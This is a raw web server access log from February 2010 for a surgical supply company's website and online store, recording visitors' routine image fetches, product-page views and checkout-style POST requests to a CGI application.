71.96.139.25 - - [23/Feb/2010:00:07:28 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:28 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:30 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:30 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.90.40.126 - - [23/Feb/2010:00:07:46 -0500] "GET /images/processcard.gif HTTP/1.1" 200 420 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815A33F69800273307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:07:47 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LK233815335D66800942307V+M37+ENG HTTP/1.1" 200 59653 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815A33F69800273307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
71.96.139.25 - - [23/Feb/2010:00:07:54 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01 HTTP/1.1" 200 52945 "http://www.acesurgical.com/collagen_ftp.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:57 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:57 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:57 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:57 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:58 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/items/5092000_THUMB.JPG HTTP/1.1" 200 2357 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/items/5094000_THUMB.JPG HTTP/1.1" 200 1963 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:07:59 -0500] "GET /images/items/5091000_THUMB.JPG HTTP/1.1" 200 1946 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:01 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:02 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:02 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:02 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:02 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:02 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:04 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:04 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:04 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:05 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:07 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:08 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):13+RNCLAS(S0040):03+RNSUBS(S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:11 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:11 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:13 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:13 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:19 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
71.96.139.25 - - [23/Feb/2010:00:08:19 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; MDDR; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.90.40.126 - - [23/Feb/2010:00:08:12 -0500] "POST /CGI-BIN/LANSAWEB?WEBEVENT+LK233815E31360800B82307V+M37+ENG HTTP/1.1" 200 40397 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815335D66800942307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:08:30 -0500] "GET /images/sd_bottom-space.gif HTTP/1.1" 200 50 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815E31360800B82307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:08:30 -0500] "GET /images/sd_bottom-right.gif HTTP/1.1" 200 101 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815E31360800B82307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:08:30 -0500] "GET /images/sd_left-bottom.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815E31360800B82307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
208.90.40.126 - - [23/Feb/2010:00:08:30 -0500] "GET /images/sd_left-top.gif HTTP/1.1" 200 95 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LK233815E31360800B82307V+M37+ENG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9"
